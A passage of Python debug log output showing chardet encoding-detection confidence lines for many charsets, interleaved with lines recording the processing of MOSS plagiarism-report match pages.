0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5281306826155204\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32122\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21455\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19364\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32122\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19364\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32109\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19365\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32109\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19364\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21456\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21455\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32109\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not 
active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356908501917945\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5596514495832396\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R 
Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338923655373736\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-1.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5325538318113453\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not 
active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17085\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17072\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17085\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17072\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17073\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-TW Taiwan 
prober hit error at byte 17072\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19076\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5351951358153133\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 
Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5286629515626814\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5430007169640202\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 
0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16351\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16338\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16351\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16338\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16338\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16339\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16338\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16126\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32278\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16113\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16126\nDEBUG:chardet.charsetprober:EUC-KR 
Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-top.html\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16113\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16113\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32279\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16114\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32278\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16113\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek 